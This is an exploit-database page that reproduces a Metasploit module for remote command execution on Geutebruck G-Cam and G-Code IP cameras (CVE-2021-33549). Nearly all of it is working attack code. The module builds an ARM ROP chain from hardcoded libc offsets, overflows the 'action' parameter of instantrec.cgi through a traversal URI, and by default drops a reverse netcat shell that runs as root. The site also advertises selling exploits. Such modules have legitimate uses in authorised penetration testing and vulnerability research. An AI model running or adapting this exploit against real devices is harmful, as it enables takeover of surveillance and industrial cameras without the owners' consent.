0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Geutebruck instantrec Remote Command Execution Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Geutebruck instantrec Remote Command Execution',
'Description' => %q{
This module exploits a buffer overflow within the 'action'
parameter of the /uapi-cgi/instantrec.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx,
ETHC-22xx, and EWPC-22xx devices running firmware versions == 1.12.0.27 as well as firmware
versions 1.12.13.2 and 1.12.14.5.
Successful exploitation results in remote code execution as the root user.
},
'Author' => [
'Titouan Lazard - RandoriSec', # Discovery
'Ibrahim Ayadhi - RandoriSec' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2021-33549'],
['URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'],
['URL', 'http://geutebruck.com'],
['URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03']
],
'DisclosureDate' => '2021-07-08',
'Privileged' => true,
'Platform' => %w[unix linux],
'Arch' => [ARCH_ARMLE],
'Targets' => [
['Automatic Target', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
},
'Notes' => {
'Stability' => ['CRASH_SAFE'],
'Reliability' => ['REPEATABLE_SESSION'],
'SideEffects' => ['ARTIFACTS_ON_DISK']
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to the instantrec page', '/uapi-cgi/instantrec.cgi'])
]
)
end
def write_payload
# gadgets
libc_add = 0x402da000
system_off = 0x00357fc
libc_data_off = 0x12c960
str_r1_off = 0x0006781c # str r0 into r4 + 0x14; pop r4 pc;
pop_r0_off = 0x00101de4 # pop r0 pc
pop_r1_off = 0x0010252c # pop r1 pc
pop_r4_off = 0x00015164 # pop r4 pc
system_ = libc_add + system_off
str_r1 = libc_add + str_r1_off
pop_r0 = libc_add + pop_r0_off
pop_r1 = libc_add + pop_r1_off
pop_r4 = libc_add + pop_r4_off
add_str = libc_data_off + libc_add + 4
chunks = (payload.raw + ' ' * (4 - payload.raw.length % 4)).unpack('I<*')
rop = []
rop += [pop_r4]
rop += [add_str - 0x14]
chunks.each_with_index do |chunk, index|
rop += [pop_r1]
rop += [chunk]
rop += [str_r1]
rop += if index != (chunks.length - 1)
[add_str - 0x14 + ((index + 1) * 4)]
else
[0x41414141]
end
end
rop += [pop_r0]
rop += [add_str]
rop += [system_]
rop.pack('V*')
end
def exploit
print_status("#{rhost}:#{rport} - Attempting to exploit...")
pad_size = 536
data = Rex::Text.pattern_create(pad_size) + write_payload
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('/', Rex::Text.rand_hostname, '../', target_uri.path),
'vars_post' => {
'action' => data
}
)
handler
end
end
# 0day.today [2024-11-14] #